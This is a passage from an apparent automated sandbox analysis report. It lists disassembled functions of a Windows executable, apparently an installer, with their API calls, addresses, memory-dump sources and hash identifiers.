                                                                                                                            • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                                                            • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                                                                                            • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                                                            • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00472154 Relevance: 6.3, APIs: 4, Instructions: 272fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                                                                                            • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                                                                                            • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFileNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2066263336-0
                                                                                                                            • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                                                            • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                                                                                            • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                                                            • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047FCF8 Relevance: 6.1, APIs: 4, Instructions: 147fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                                                            • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                                                            • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFileNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2066263336-0
                                                                                                                            • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                                                            • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                                                                                            • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                                                            • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00421274 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetMenu.USER32(00000000), ref: 00421361
                                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3711407533-0
                                                                                                                            • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                                                            • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                                                                            • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                                                            • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00416B42 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                                                                            • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$CallMessageProcSendTextWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 601730667-0
                                                                                                                            • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                                                            • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                                                                            • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                                                            • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00454F7C Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                                                            • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4071923889-0
                                                                                                                            • Opcode ID: e6feda7d3358a80d2693463bb1cb51aaf78648cef31b4280cf5022ab190105ae
                                                                                                                            • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                                                            • Opcode Fuzzy Hash: e6feda7d3358a80d2693463bb1cb51aaf78648cef31b4280cf5022ab190105ae
                                                                                                                            • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004230C8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 0042311E
                                                                                                                            • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsDeviceEnumFontsRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2698912916-0
                                                                                                                            • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                                                            • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                                                            • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                                                            • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040626C Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                                                            • GlobalUnWire.KERNEL32(00000000), ref: 00406276
                                                                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                                                            • GlobalFix.KERNEL32(00000000), ref: 00406281
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$AllocHandleWire
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2210401237-0
                                                                                                                            • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                                            • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                                                            • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                                            • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0045C264 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                                            • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                                                            Strings
                                                                                                                            • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                                                            • NumRecs range exceeded, xrefs: 0045C396
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$BuffersFlush
                                                                                                                            • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                                            • API String ID: 3593489403-659731555
                                                                                                                            • Opcode ID: 801dcd038e335b265826125cf8ff6a7c252aa7dfa969982b1ed0869fe0f6d4ae
                                                                                                                            • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                                                            • Opcode Fuzzy Hash: 801dcd038e335b265826125cf8ff6a7c252aa7dfa969982b1ed0869fe0f6d4ae
                                                                                                                            • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402088 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                                            • String ID: he
                                                                                                                            • API String ID: 296031713-1137534704
                                                                                                                            • Opcode ID: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                                                            • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                                                                            • Opcode Fuzzy Hash: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                                                            • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00498BA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                                                              • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                                                              • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                                              • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                                              • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                                              • Part of subcall function 004063C4: 6F561CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                                                              • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                                                              • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                                                              • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                                              • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                                              • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                                                              • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                                                              • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                                                              • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                                                              • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                                                              • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                                              • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                                              • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                                              • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                                              • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                                                              • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                                                              • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                                                              • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                                              • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                                                              • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                                              • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                                              • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                            • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                                                              • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF561FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                                            • String ID: Setup
                                                                                                                            • API String ID: 629812316-3839654196
                                                                                                                            • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                                            • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                                                            • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                                            • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042DC00 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: QueryValue
                                                                                                                            • String ID: $=H
                                                                                                                            • API String ID: 3660427363-3538597426
                                                                                                                            • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                                            • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                                                            • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
